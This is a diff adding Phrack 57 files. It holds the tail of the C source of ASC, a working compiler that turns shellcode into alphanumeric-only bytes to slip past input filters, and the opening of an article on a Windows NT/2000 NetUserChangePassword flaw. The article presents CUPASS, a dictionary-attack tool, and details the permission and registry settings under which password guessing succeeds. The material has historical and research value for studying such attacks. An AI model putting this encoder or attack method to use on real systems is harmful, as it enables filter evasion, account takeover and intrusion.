+   PUSHd(s,DWORD(XOR(SB1,xSB1),XOR(SB2,xSB2),XOR(SB3,xSB3),alphanumeric_get_byte())); /* push ~xSB1 ~xSB2 ~xSB3 */
+   POPr(s,EAX);                                              /* pop eax */
+   XOR_EAX(s,DWORD(xSB1,xSB2,xSB3,alphanumeric_get_byte())); /* xor eax,xSB1 xSB2 xSB3 =>EAX=SB1 SB2 SB3 */
+   PUSHr(s,EAX);                                             /* push eax */
+   INCr(s,ESP);                                              /* inc esp */
+   break;
+  case 4:
+   xSB1=alphanumeric_get_complement(SB1);
+   xSB2=alphanumeric_get_complement(SB2);
+   xSB3=alphanumeric_get_complement(SB3);
+   xSB4=alphanumeric_get_complement(SB4);
+   PUSHd(s,DWORD(XOR(SB1,xSB1),XOR(SB2,xSB2),XOR(SB3,xSB3),XOR(SB4,xSB4))); /* push ~xSB1 ~xSB2 ~xSB3 ~xSB4 */
+   POPr(s,EAX);                           /* pop eax */
+   XOR_EAX(s,DWORD(xSB1,xSB2,xSB3,xSB4)); /* xor eax,xSB1 xSB2 xSB3 xSB4 =>EAX=SB1 SB2 SB3 SB4 */
+   PUSHr(s,EAX);                          /* push eax */
+   break;
+  }
+  break;
+ }
+
+ /* possibly realize a NOT on the stack */
+ if ((category==CATEGORY_ALPHA_NOT)||(category==CATEGORY_XOR_NOT)) alphanumeric_stack_generate_not(s,size);
+
+ return 0;
+}
+
+
+/* generate the original shellcode on the stack */
+/* ============================================ */
+int alphanumeric_stack_generate(struct Sshellcode *output,struct Sshellcode *input) {
+ int category,size,i;
+
+ if (input==NULL) return -1;
+ if (output==NULL) return -1;
+
+ i=input->size-1;
+ while (i>=0) { /* loop from the right to the left of our original shellcode */
+  category=alphanumeric_stack_get_category(input->opcodes[i]);
+  size=1; /* by default, we have 1 byte of the same category */
+
+  /* loop until maximum 3 previous bytes are from the same category */
+  while ((i-size>=0)&&(size<4)&&(alphanumeric_stack_get_category(input->opcodes[i-size])==category)) size++;
+
+  /* write those bytes on the stack */
+  alphanumeric_stack_generate_push(output,category,&input->opcodes[i-size+1],size);
+
+  i-=size;
+ }
+ return 0;
+}
+
+/* +------------------------------------------------------------------------+ */
+/* |                       PATCHES MANIPULATIONS FUNCTIONS                  | */
+/* +------------------------------------------------------------------------+ */
+
+/* return the category of the byte */
+/* =============================== */
+int alphanumeric_patches_get_category(unsigned char c) {
+ if (alphanumeric_check(c)) return CATEGORY_ALPHA;
+ else if (c<0x80) return CATEGORY_XOR;
+ else { /* need a NOT */
+  c=NOT(c);
+  if (alphanumeric_check(c)) return CATEGORY_ALPHA_NOT;
+  else return CATEGORY_XOR_NOT;
+ }
+}
+
+
+/* generate the patches initialization shellcode */
+/* ============================================ */
+int alphanumeric_patches_generate_initialization(struct Sshellcode *shellcode,
+int patcher_size,int alpha_begin,int base,unsigned char disp8) {
+ struct Sshellcode *s;
+ int offset; /* real offset for original shellcode to patch */
+ struct Sshellcode *p_offset; /* offset "shellcode" */
+ int fill_size; /* size to add to the initialization shellcode to align */
+ int initialization_size,i;
+
+ if (shellcode==NULL) return -1;
+
+ initialization_size=0;
+ while(1) { /* loop until we create a valid initialization shellcode */
+  s=shellcode_malloc();
+  fill_size=0;
+
+  PUSHr(s,alphanumeric_get_register(M_REGISTERS));  /* push r32 =>EAX */
+  PUSHr(s,alphanumeric_get_register(M_REGISTERS));  /* push r32 =>ECX */
+  PUSHr(s,alphanumeric_get_register(M_EDX|M_EBX|M_ESI|M_EDI)); /* push FFFFFFFF =>EDX */
+  if (base==EBX) {
+   PUSHr(s,EBP);                                    /* push ebp =>EBX */
+  }
+  else {
+   PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>EBX */
+  }
+  PUSHr(s,alphanumeric_get_register(M_REGISTERS));  /* push r32 =>ESP */
+
+  offset=shellcode->size+initialization_size+patcher_size+alpha_begin-disp8; /* calculate the real offset */
+
+  /* if the offset is not correct we must modify the size of our initialization shellcode */
+  if (offset<0) { /* align to have a positive offset */
+   fill_size=-offset;
+   offset=0;
+  }
+  if (offset&1) { /* align for the 2*ebp */
+   fill_size++;
+   offset++;
+  }
+  offset/=2;
+
+  p_offset=shellcode_malloc();
+  DB(p_offset,BYTE(offset,0));
+  DB(p_offset,BYTE(offset,1));
+  DB(p_offset,BYTE(offset,2));
+  DB(p_offset,BYTE(offset,3));
+  alphanumeric_stack_generate(s,p_offset);          /* push offset => EBP */
+  shellcode_free(p_offset);
+
+  PUSHr(s,alphanumeric_get_register(M_EDX|M_EBX|M_ESI|M_EDI)); /* push FFFFFFFF =>ESI */
+  if (base==EDI) {
+   PUSHr(s,EBP);                                    /* push ebp =>EDI */
+  }
+  else {
+   PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>EDI */
+  }
+  POPAD(s);                                         /* popad */
+
+  if (s->size<=initialization_size) break; /* if the offset is good */
+
+  initialization_size++;
+ }
+ /* the offset is good */
+
+ /* fill to reach the initialization_size value */
+ while (s->size<initialization_size) INCr(s,ECX);
+ /* fill to reach the offset value */
+ for (i=0;i<fill_size;i++) INCr(s,ECX);
+
+ shellcode_cat(shellcode,s);
+ shellcode_free(s);
+ return 0;
+}
+
+
+/* generate the xor patch */
+/* ====================== */
+#define PB1 bytes[0]
+#define PB2 bytes[1]
+#define PB3 bytes[2]
+#define PB4 bytes[3]
+
+int alphanumeric_patches_generate_xor(struct Sshellcode *s,int category,
+                     unsigned char *bytes,int size,int base,char disp8) {
+ unsigned char xPB1,xPB2,xPB3,xPB4;
+ int reg,i;
+
+ if (s==NULL) return -1;
+
+ /* eventually realize a NOT on bytes[] */
+ if ((category==CATEGORY_ALPHA_NOT)||(category==CATEGORY_XOR_NOT)) {
+  for (i=0;i<size;i++) bytes[i]=NOT(bytes[i]);
+ }
+
+  /* generate the bytes in the original shellcode */
+ switch(category) {
+ case CATEGORY_ALPHA:
+ case CATEGORY_ALPHA_NOT:
+  /* nothing to do */
+  break;
+ case CATEGORY_XOR:
+ case CATEGORY_XOR_NOT:
+  reg=alphanumeric_get_register(M_EAX|M_ECX);
+  switch(size) {
+  case 1:
+   xPB1=alphanumeric_get_complement(PB1);
+   PUSHb(s,XOR(PB1,xPB1));        /* push ~xPB1 */
+   POPr(s,reg);                   /* pop reg */
+   PB1=xPB1;                      /* modify into the original shellcode */
+   XORsib8(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],reg => xor xPB1,~xPB1 */
+   break;
+  case 2:
+   xPB1=alphanumeric_get_complement(PB1);
+   xPB2=alphanumeric_get_complement(PB2);
+   PUSHw(s,WORD(XOR(PB2,xPB2),XOR(PB1,xPB1))); /* push ~xPB2 ~xPB1 */
+   O16(s);POPr(s,reg); /* pop reg */
+   PB1=xPB1;           /* modify into the original shellcode */
+   PB2=xPB2;
+   O16(s);XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],reg => xor xPB2 xPB1,~xPB2 ~xPB1 */
+   break;
+  case 4:
+   xPB1=alphanumeric_get_complement(PB1);
+   xPB2=alphanumeric_get_complement(PB2);
+   xPB3=alphanumeric_get_complement(PB3);
+   xPB4=alphanumeric_get_complement(PB4);
+   PUSHd(s,DWORD(XOR(PB4,xPB4),XOR(PB3,xPB3),XOR(PB2,xPB2),XOR(PB1,xPB1))); /* push ~xPB4 ~xPB3 ~xPB2 ~xPB1 */
+   POPr(s,reg); /* pop reg */
+   PB1=xPB1;    /* modify into the original shellcode */
+   PB2=xPB2;
+   PB3=xPB3;
+   PB4=xPB4;
+   XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],reg => xor xPB4 xPB3 xPB2 xPB1,~xPB4 ~xPB3 ~xPB2 ~xPB1 */
+   break;
+  }
+  break;
+ }
+
+ /* eventually realize a NOT on the shellcode */
+ if ((category==CATEGORY_ALPHA_NOT)||(category==CATEGORY_XOR_NOT)) {
+  reg=alphanumeric_get_register(M_EDX|M_ESI);
+  switch(size) {
+  case 1:
+   XORsib8(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],dl/dh */
+   break;
+  case 2:
+   O16(s);XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],dx/si */
+   break;
+  case 4:
+   XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],edx/esi */
+   break;
+  }
+ }
+
+ return 0;
+}
+
+
+/* generate the patch and the original shellcode */
+/* ============================================= */
+int alphanumeric_patches_generate(struct Sshellcode *output,struct Sshellcode *input) {
+ struct Sshellcode *out,*in; /* input and output codes */
+ struct Sshellcode *best; /* last best shellcode */
+ struct Sshellcode *patcher; /* patches code */
+ int alpha_begin,alpha_end; /* offsets of the patchable part */
+ int base; /* base register */
+ unsigned char *disp8_begin; /* pointer to the current first disp8 */
+ unsigned char disp8;
+ int category,size,i,j;
+
+ if (input==NULL) return -1;
+ if (output==NULL) return -1;
+
+ /* get the offset of the first and last non alphanumeric bytes */
+ for (alpha_begin=0;alpha_begin<input->size;alpha_begin++) {
+  if (!alphanumeric_check(input->opcodes[alpha_begin])) break;
+ }
+ if (alpha_begin>=input->size) { /* if patching is not needed */
+  shellcode_cat(output,input);
+  return 0;
+ }
+ for (alpha_end=input->size-1;alpha_end>alpha_begin;alpha_end--) {
+  if (!alphanumeric_check(input->opcodes[alpha_end])) break;
+ }
+
+ base=alphanumeric_get_register(M_EBX|M_EDI);
+ best=shellcode_malloc();
+ disp8_begin=ALPHANUMERIC_BYTES;
+
+ while (*disp8_begin!=0) { /* loop for all possible disp8 values */
+  disp8=*disp8_begin;
+
+  /* allocate all shellcodes */
+  out=shellcode_malloc();
+  shellcode_cpy(out,output);
+  in=shellcode_malloc();
+  shellcode_cpy(in,input);
+  patcher=shellcode_malloc();
+
+  i=alpha_begin;
+  size=0;
+  while (i<=alpha_end) { /* loop into our original shellcode */
+   /* increment the offset if needed */
+   for (j=0;j<size;j++) {
+    if (alphanumeric_check(disp8+1)) {
+     disp8++;
+    }
+    else INCr(patcher,base); /* inc base */
+   }
+
+   category=alphanumeric_patches_get_category(in->opcodes[i]);
+   size=1; /* by default, we have 1 byte of the same category */
+
+   /* loop until maximum 3 next bytes are from the same category */
+   while ((i+size<=alpha_end)&&(size<4)&&(alphanumeric_patches_get_category(in->opcodes[i+size])==category)) size++;
+   if (size==3) size=2; /* impossible to XOR 3 bytes */
+
+   /* patch those bytes */
+   alphanumeric_patches_generate_xor(patcher,category,&in->opcodes[i],size,base,disp8);
+
+   i+=size;
+  }
+
+  alphanumeric_patches_generate_initialization(out,patcher->size,alpha_begin,
+  base,*disp8_begin); /* create a valid initialization shellcode */
+
+  shellcode_cat(out,patcher);
+  shellcode_cat(out,in);
+
+  if ((best->size==0)||(out->size<best->size)) shellcode_cpy(best,out);
+  /* if this is a more interesting shellcode, we save it */
+
+  /* free all shellcodes and malloc */
+  shellcode_free(out);
+  shellcode_free(in);
+  shellcode_free(patcher);
+  disp8_begin++;
+ }
+
+ shellcode_cpy(output,best);
+ shellcode_free(best);
+ return 0;
+}
+
+/******************************************************************************/
+
+/* +------------------------------------------------------------------------+ */
+/* |                          INTERFACE FUNCTIONS                           | */
+/* +------------------------------------------------------------------------+ */
+
+void print_syntax() {
+ fprintf(stderr,"ASC - IA32 Alphanumeric Shellcode Compiler\n");
+ fprintf(stderr,"==========================================\n");
+ fprintf(stderr,"SYNTAX  : asc [options] <input file[.c]>\n");
+ fprintf(stderr,"COMPILATION OPTIONS :\n");
+ fprintf(stderr," -a[ddress] stack|<r32>     : address of shellcode (default=stack)\n");
+ fprintf(stderr," -m[ode] stack|patches      : output shellcode build mode (default=patches)\n");
+ fprintf(stderr," -s[tack] call|jmp|null|ret : method to return to original code on the stack\n");
+ fprintf(stderr,"                              (default=null)\n");
+ fprintf(stderr,"DEBUGGING OPTIONS :\n");
+ fprintf(stderr," -debug-start               : breakpoint to start of compiled shellcode\n");
+ fprintf(stderr," -debug-build-original      : breakpoint to building of original shellcode\n");
+ fprintf(stderr," -debug-build-jump          : breakpoint to building of stack jump code\n");
+ fprintf(stderr," -debug-jump                : breakpoint to stack jump\n");
+ fprintf(stderr," -debug-original            : breakpoint to start of original shellcode\n");
+ fprintf(stderr,"INPUT/OUTPUT OPTIONS :\n");
+ fprintf(stderr," -c[har] <char[] name>      : name of C input array (default=first array)\n");
+ fprintf(stderr," -f[ormat] bin|c            : output file format (default=bin)\n");
+ fprintf(stderr," -o[utput] <output file>    : output file name (default=stdout)\n");
+
+
+
+ fprintf(stderr,"\n");
+ fprintf(stderr,"ASC 0.9.1                                                    rix@hert.org @2001\n");
+ exit(1);
+}
+
+
+void print_error() {
+ perror("Error ASC");
+ exit(1);
+};
+
+/* +------------------------------------------------------------------------+ */
+/* |                             MAIN PROGRAM                               | */
+/* +------------------------------------------------------------------------+ */
+
+#define STACK REGISTERS+1
+
+#define INPUT_FORMAT_BIN 0
+#define INPUT_FORMAT_C 1
+
+#define OUTPUT_FORMAT_BIN 0
+#define OUTPUT_FORMAT_C 1
+
+#define OUTPUT_MODE_STACK 0
+#define OUTPUT_MODE_PATCHES 1
+
+#define STACK_MODE_CALL 0
+#define STACK_MODE_JMP 1
+#define STACK_MODE_NULL 2
+#define STACK_MODE_RET 3
+
+
+int main(int argc, char **argv) {
+ char *input_filename=NULL,*output_filename=NULL;
+ struct Sshellcode *input=NULL,*output=NULL,*stack=NULL;
+
+ char input_format=INPUT_FORMAT_BIN;
+ char *input_variable=NULL;
+ char address=STACK;
+ char output_format=OUTPUT_FORMAT_BIN;
+ char output_mode=OUTPUT_MODE_PATCHES;
+ char stack_mode=STACK_MODE_NULL;
+
+ int debug_start=0;
+ int debug_build_original=0;
+ int debug_build_jump=0;
+ int debug_jump=0;
+ int debug_original=0;
+
+ int ret,l;
+
+
+ /* command line parameters definition */
+ #define SHORT_OPTIONS "a:c:f:m:o:s:"
+ struct option long_options[]={
+  /* {"name",has_arg,&variable,value} */
+  {"address",1,NULL,'a'},
+  {"mode",1,NULL,'m'},
+  {"stack",1,NULL,'s'},
+
+  {"debug-start",0,&debug_start,1},
+  {"debug-build-original",0,&debug_build_original,1},
+  {"debug-build-jump",0,&debug_build_jump,1},
+  {"debug-jump",0,&debug_jump,1},
+  {"debug-original",0,&debug_original,1},
+
+  {"char",1,NULL,'c'},
+  {"format",1,NULL,'f'},
+  {"output",1,NULL,'o'},
+
+  {0,0,0,0}
+ };
+ int c;
+ int option_index=0;
+
+
+ /* read command line parameters */
+ opterr=0;
+ while ((c=getopt_long_only(argc,argv,SHORT_OPTIONS,long_options,&option_index))!=-1) {
+  switch (c) {
+  case 'a':
+   if (!strcmp(optarg,"eax")) address=EAX;
+   else if (!strcmp(optarg,"ebx")) address=EBX;
+   else if (!strcmp(optarg,"ecx")) address=ECX;
+   else if (!strcmp(optarg,"edx")) address=EDX;
+   else if (!strcmp(optarg,"esp")) address=ESP;
+   else if (!strcmp(optarg,"ebp")) address=EBP;
+   else if (!strcmp(optarg,"esi")) address=ESI;
+   else if (!strcmp(optarg,"edi")) address=EDI;
+   else if (!strcmp(optarg,"stack")) address=STACK;
+   else print_syntax();
+   break;
+  case 'c':
+   input_format=INPUT_FORMAT_C;
+   input_variable=optarg;
+   break;
+  case 'f':
+   if (!strcmp(optarg,"bin")) output_format=OUTPUT_FORMAT_BIN;
+   else if (!strcmp(optarg,"c")) output_format=OUTPUT_FORMAT_C;
+   else print_syntax();
+   break;
+  case 'm':
+   if (!strcmp(optarg,"stack")) output_mode=OUTPUT_MODE_STACK;
+   else if (!strcmp(optarg,"patches")) output_mode=OUTPUT_MODE_PATCHES;
+   else print_syntax();
+   break;
+  case 'o':
+   output_filename=optarg;
+   break;
+  case 's':
+   output_mode=OUTPUT_MODE_STACK;
+   if (!strcmp(optarg,"call")) stack_mode=STACK_MODE_CALL;
+   else if (!strcmp(optarg,"jmp")) stack_mode=STACK_MODE_JMP;
+   else if (!strcmp(optarg,"null")) stack_mode=STACK_MODE_NULL;
+   else if (!strcmp(optarg,"ret")) stack_mode=STACK_MODE_RET;
+   else print_syntax();
+   break;
+  case 0: /* long option set variable */
+   break;
+  case '?': /* error option character */
+  case ':': /* error option parameter */
+  default:
+   print_syntax();
+  }
+ }
+
+ if (optind+1!=argc) print_syntax(); /* if no input file specified */
+ input_filename=argv[optind];
+ /* detect the input file format */
+ l=strlen(input_filename);
+ if ((l>2)&&(input_filename[l-2]=='.')&&(input_filename[l-1]=='c')) input_format=INPUT_FORMAT_C;
+
+ random_initialize();
+ input=shellcode_malloc();
+ output=shellcode_malloc();
+
+
+ /* read input file */
+ if (debug_original) INT3(input);
+ fprintf(stderr,"Reading %s ... ",input_filename);
+
+ switch(input_format) {
+ case INPUT_FORMAT_BIN:
+  ret=shellcode_read_binary(input,input_filename);
+  break;
+ case INPUT_FORMAT_C:
+  ret=shellcode_read_C(input,input_filename,input_variable);
+  break;
+ }
+ if (ret==-1) {
+  fprintf(stderr,"\n");
+  print_error();
+ }
+ if (!debug_original) fprintf(stderr,"(%d bytes)\n",input->size);
+ else fprintf(stderr,"(%d bytes)\n",input->size-1);
+
+
+ if (debug_start) INT3(output);
+
+ /* obtain the shellcode address */
+ if (address==STACK) address=alphanumeric_get_address_stack(output);
+ alphanumeric_initialize_registers(output,address);
+
+ /* generate the original shellcode */
+ if (debug_build_original) INT3(output);
+ switch(output_mode) {
+ case OUTPUT_MODE_STACK:
+  alphanumeric_stack_generate(output,input);
+
+  if (stack_mode!=STACK_MODE_NULL) { /* if jump building needed */
+   stack=shellcode_malloc();
+   if (debug_jump) INT3(stack);
+   switch(stack_mode) {
+   case STACK_MODE_CALL:
+    CALL_ESP(stack);  /* call esp */
+    break;
+   case STACK_MODE_JMP:
+    JMP_ESP(stack);   /* jmp esp */
+    break;
+   case STACK_MODE_RET:
+    PUSHr(stack,ESP); /* push esp */
+    RET(stack);       /* ret */
+    break;
+   }
+   if (debug_build_jump) INT3(output);
+   alphanumeric_patches_generate(output,stack);
+   shellcode_free(stack);
+  }
+  else { /* no jump building needed */
+   if (debug_jump) INT3(output);
+  }
+  break;
+
+ case OUTPUT_MODE_PATCHES:
+  alphanumeric_patches_generate(output,input);
+  break;
+ }
+
+
+ /* print shellcode to the screen */
+ fprintf(stderr,"Shellcode (%d bytes):\n",output->size);
+ shellcode_print(output);
+ fclose(stdout);
+ fprintf(stderr,"\n");
+
+ /* write input file */
+ if (output_filename) {
+  fprintf(stderr,"Writing %s ...\n",output_filename);
+
+  switch(output_format) {
+  case OUTPUT_FORMAT_BIN:
+   ret=shellcode_write_binary(output,output_filename);
+   break;
+  case OUTPUT_FORMAT_C:
+   ret=shellcode_write_C(output,output_filename);
+   break;
+  }
+  if (ret==-1) {
+   shellcode_free(input);
+   shellcode_free(output);
+   print_error();
+  }
+ }
+
+ shellcode_free(input);
+ shellcode_free(output);
+ fprintf(stderr,"Done.\n");
+}
+
+/******************************************************************************/
+<-->
+
+|EOF|--------------------------------------------------------------------|
diff --git a/phrack57/16.txt b/phrack57/16.txt
new file mode 100644
index 0000000..e9f72a4
--- /dev/null
+++ b/phrack57/16.txt
@@ -0,0 +1,810 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x10 of 0x12
+
+|=---------=[ CUPASS AND THE NETUSERCHANGEPASSWORD PROBLEM ]=------------=|
+|=-----------------------------------------------------------------------=|
+|=-------=[ Doc Holiday / THC <holiday@TheHackersChoice.com> ]=----------=|
+
+
+
+----|  INTRODUCTION
+
+
+
+Microsoft has a known problem in Windows NT 4, that enables an attacker
+to change the password of any user under special/default circumstances.
+
+
+The same problem reappeared in Windows 2000 some days ago. The flaw exists
+in Microsofts implementation of the NetUserChangePassword function.
+
+
+These facts inspired me to write this article and CUPASS, a simple tool 
+that starts a dictionary attack against user accounts. 
+
+
+In this article I want to discuss all things worth knowing about the 
+NetUserChangePassword problem.
+
+
+Have fun while reading this article...
+
+
+Doc Holiday /THC
+
+
+
+
+----| THE PASSWORD CHANGE PROTOCOLS
+
+
+As a little background I will tell you something about the possibilites
+to change a password in a Windows NT/W2K environment.
+
+
+Windows 2000 supports several protocols for changing passwords which
+are used under different circumstances. 
+
+
+These protocols are 
+
+
+- NetUserChangePassword protocol (we will call it NUCP)
+- NetUserSetInfo protocol
+- Kerberos change-password protocol
+- Kerberos set-password protocol
+- LDAP write-password attribute (presumes 128Bit SSL)
+- XACT-SMB protocol (for LAN Manager compatibility)
+
+
+Because there is a flaw in Microsofts implementation of the NUCP protocol,
+we will have a deeper look at this one.
+
+
+
+----| PROTOCOL ELECTION
+
+
+We can see that there are a lot of protocols for changing passwords in an 
+Microsoft environment. Now I will show in which cases the NUCP is used:
+
+
+case 1
+------
+
+
+If a user changes his password by pressing CTRL+ALT+DELETE and pressing the 
+"Change Password" button, the NUCP protocol is used, if the target is a
+domain or the local member server or workstation.
+
+
+If the target is a Kerberos realm, the Kerberos change-password protocol is 
+used instead of NUCP.
+
+
+case 2
+------
+
+
+If a change password request is initiated from an Windows NT 3.x or NT 4
+machine, the NUCP and/or NetUserSetInfo protocols are used.
+
+
+case 3
+------
+
+
+If a program uses the NUCP method on the Active Directory Services
+Interface (ADSI), the IaDSUser interface first tries to change the
+password with the LDAP protocol, and then by using the NUCP method.
+
+
+
+
+----| NUCP FUNCTION CALL
+
+
+At this time we know that a lot of ways exist to change a users 
+password. We also know in which cases NUCP is used.
+
+
+Now we want to have a little look at the function NetUserChangePassword
+itself. (More detailed information can be found at Microsoft's SDK!)
+
+
+
+Prototype
+---------
+
+
+The prototype of the NetUserChangePassword function is defined in
+"lmaccess.h", and looks as follows:
+
+
+
+NET_API_STATUS NET_API_FUNCTION
+NetUserChangePassword (
+    IN  LPCWSTR   domainname OPTIONAL,
+    IN  LPCWSTR   username OPTIONAL,
+    IN  LPCWSTR   oldpassword,
+    IN  LPCWSTR   newpassword
+    );
+
+
+
+The parameters are explained consecutively:
+
+
+
+Parameters
+----------
+
+
+->domainname
+  ----------
+
+
+  Pointer to a null-terminated Unicode string that specifies the name of a 
+  remote server or domain. 
+
+
+->username
+  --------
+
+
+  Pointer to a null-terminated Unicode string that specifies a user name. 
+
+
+->oldpassword
+  -----------
+
+
+  Pointer to a null-terminated Unicode string that specifies the user's
+  old password on the server or domain. 
+
+
+->newpassword
+  -----------
+
+
+  Pointer to a null-terminated Unicode string that specifies the user's new
+  password on the server or domain.  
+
+
+
+Return values
+-------------
+
+
+The return values are defined in "LMERR.H" and "WINERROR.H".
+
+
+With a deeper look in this files we can see that if the function was executed
+with success, the return value is 0 (zero) btw. NERR_Success.
+
+
+
+The most important error values are:
+
+
+->ERROR_ACCESS_DENIED (WINERROR.H)
+  --------------------------------
+
+
+  Access is denied ;)
+
+
+  If the target is a NT Server/Domain Controller, and the
+  option "User Must Log On in Order to Change Password" is enabled,
+  this error code is the result of CUPASS. The password could
+  not be guessed :(
+
+
+  If the target is a W2K domain controller with AD installed,
+  and the EVERYONE group is removed from the group
+  "Pre-Windows 2000 compatible access", than this error code
+  is an result of NUCP.
+
+
+  In some cases this means the right password was guessed by
+  CUPASS, but could not be changed because of insufficient
+  permissions on the corresponding AD object.
+
+
+
+->ERROR_INVALID_PASSWORD (WINERROR.H)
+  -----------------------------------
+
+
+  The guessed password (oldpassword) was invalid
+
+
+
+->ERROR_ACCOUNT_LOCKED_OUT (WINERROR.H)
+  -------------------------------------
+
+
+  The account is locked due to many logon tries.
+
+
+
+->ERROR_CANT_ACCESS_DOMAIN_INFO (WINERROR.H)
+  ------------------------------------------
+
+
+  Indicates a Windows NT Server could not be contacted or that
+  objects within the domain are protected such that necessary
+  information could not be retrieved.
+
+
+
+->NERR_UserNotFound (LMERR.H)
+  ---------------------------
+
+
+  The useraccount could not be found on the given server.
+
+
+
+->NERR_NotPrimary (LMERR.H)
+  -------------------------
+
+
+  The operation is only allowed on the PDC. This appears e.g. if 
+  you try to change passwords on a BDC.
+
+
+
+This return values are evaluated by CUPASS. For all others, the numeric
+value will be shown, and you can simply have a look at this files for 
+the meaning of the errorcode.
+
+
+
+
+MORE DETAILS ON NUCP API CALL
+-----------------------------
+
+
+The NUCP function is only available on Windows NT and Windows 2000
+platforms.
+
+
+As part of the LanMan-API the NUCP function is UNICODE only!!! 
+This makes the programming a little bit harder, but not impossible :)
+
+
+UNICODE on Windows is an topic for itself, and we dont want to talk more
+about it here. Have a look at Microsofts msdn webpage or Charles
+Petzolds book about Windows programming, if you are interested in this
+topic.
+
+
+For a successfull usage of NUCP, you have to link your program with the 
+"Netapi32.lib" library!
+
+
+
+
+----| REQUIRED PERMISSIONS FOR NUCP 
+
+
+NUCP is part of the Microsoft network management functions.
+The management functions consists of different groups like
+NetFileFunctions, ScheduleFunctions, ServerFunctions, UserFunctions etc.
+
+
+These functions are again splitted in Query Functions and Update Functions. 
+Whilst query functions just allow to query informations, the update
+functions allow changes on objects.
+
+
+An example for a query function is e.g the NetUserEnum function which
+provides information about all user accounts on a server. 
+
+
+An example for an update function is the NetUserChangePassword function
+which changes the password of a user account :)
+
+
+Its easy to imagine, that query functions need less permissions than update
+functions for beeing executed.
+
+
+
+Lets have a look what permissions are needet:
+
+
+
+WINDOWS NT
+----------
+
+
+The query functions like NetGroupEnum, NetUserEnum etc. and can be
+executed by all authenticated users.
+
+
+This includes Anonymous users, if the RestrictAnonymous policy setting
+allows anonymous access.
+
+
+On a Windows NT member server, workstation or PDC, the
+NetUserChangePassword function can only be (successfull) executed by
+Administrators, Account Operators or the user of the account, if the option
+'User Must Log On in Order to Change Password' for this user is enabled.
+
+
+If 'User Must Log On in Order to Change Password'  is not enabled, a user can
+change the password of any other user, as long he knows the actual password.
+
+
+
+WINDOWS 2000
+------------
+
+
+The query functions like NetGroupEnum, NetUserEnum etc. can be executed by
+all authenticated users. This includes Anonymous users, if the
+RestrictAnonymous policy setting allows anonymous access.
+
+
+On a W2K member server or workstation the NetUserChangePassword function
+should only be (successfully) executable by Administrators, Account
+Operators or the user of the account.
+
+
+That this isn't the case, can be shown with CUPASS, because here is the
+flaw that Microsoft made with his implementation of NetUserChangePassword.
+
+
+On W2K member servers and workstations, the NetUserChangePassword function
+can be successfully executed by any user who knows the current password of
+the attacked user account.
+
+
+
+( For your information:
+
+
+The option 'User Must Log On in Order to Change Password' has been removed
+>from W2K! )
+
+
+
+On a W2K domain controller with Active Directory, access to an object is
+granted based on the ACL of the object (Because W2K with installed AD
+stores the user passwords in the AD in contrast to NT 3.x/4).
+
+
+Network management query functions are permitted to all authenticated
+users and the members of the group "Pre-Windows 2000 compatible access"
+by the default ACL's.
+
+
+Theoretical Network Management Update functions like NUCP are only
+permitted to Administrators and Account Operators.
+
+
+That this is not the case, can also be shown with CUPASS.
+
+
+CUPASS works fine if AD is installed on the target system.
+
+
+If the "everyone" group is removed from the
+"Pre-Windows 2000 compatible access" group, the result of CUPASS will
+be Errorcode 5, which means ACCESS_DENIED!.
+
+
+My research shows that anyhow the password is guessed by CUPASS, but
+can not be changed because of insufficient permissions on the AD object!
+
+
+
+----| ANONYMOUS CONNECT
+
+
+There is something I didn't talk about much, the Anonymous User Problem,
+also known as the NULL-User problem.
+
+
+Lets have a short look at how the Anonymous security settings will take affect
+to the NUCP problem:
+
+
+-> W2K
+   ---
+
+
+   The value Data of the following registry value regulates the behaviour
+   of the operating system regarding to the NULL USER CONNECT.
+
+
+   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA 
+   Value: RestrictAnonymous
+   Value Type: REG_DWORD
+
+
+   If RestrictAnonymous is set to 0 (zero), which is the default setting,
+   CUPASS will work properly.
+
+
+   If RestrictAnonymous is set to 1, what means the enumeration of SAM
+   accounts and names is not allowed, CUPASS will work properly.
+  
+   If RestrictAnonymous is set to 2, what means no access without explicit
+   anonymous permissions, there is no possibility to change the password
+   with NUCP :(
+   
+   Because the value 2 has comprehensive consequences to the behaviour of
+   the windows environment (e.g. Browser service will not work properly,
+   netlogon secure channels could not be established properly by member
+   workstations etc..) it is rare used. 
+
+
+   These settings are the same on W2K member server and W2K DC with AD!
+
+
+
+-> NT4
+   ---
+ 
+   The value Data of the following registry value regulates the behaviour
+   of the operating system regarding to the NULL USER CONNECT.
+
+
+   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA 
+   Value: RestrictAnonymous
+   Value Type: REG_DWORD
+
+
+   Converse to W2K there are only two valid values 0 (zero) and 1 for
+   RestrictAnonymous.
+
+
+   If RestrictAnonymous is set to 0 (zero), which is the default setting,
+   CUPASS will work properly.
+
+
+   If RestrictAnonymous is set to 1, what means the enumeration of SAM
+   accounts and names is not allowed, CUPASS will work properly.
+
+
+
+
+
+
+COMMON
+------
+
+
+The process that calls the NetUserChangePassword function in some cases
+must have the SE_CHANGE_NOTIFY_NAME privilege
+(except for system account and members of the local Administrator group).
+Per default this privilege is enabled for every account, but can be
+disabled by the administrator.
+
+
+SE_CHANGE_NOTIFY_NAME could not be found at the privileges,
+because it is called "Bypass traverse checking"!
+
+
+This is an declarative from Microsoft. I tried it, but I didn't find a case
+in that this right was necessary to execute the NUCP function call.
+
+
+
+
+----| POLICY AND LOGGING
+
+
+I will have a look for the policy settings, that will take affect to the
+NUCP problem.
+
+
+
+ACCOUNT POLICIES
+----------------
+
+
+->PASSWORD POLICY
+  ---------------
+  
+  The settings "Enforce password history" and  "Minimum password age"
+  will take effect to the result of CUPASS, in the way that CUPASS can't
+  "realy" change the password, and the error code 2245 will result. 
+ 
+  But this doesn't matter, because we know the "old" password at this time,
+  and CUPASS just tried to replace the "old" password with the "old"
+  password again.
+    
+
+
+->ACCOUNT LOGOUT POLICY
+  ---------------------
+ 
+  Account lockout treshold
+  ------------------------
+
+
+  The settings "Account lockout duration" and
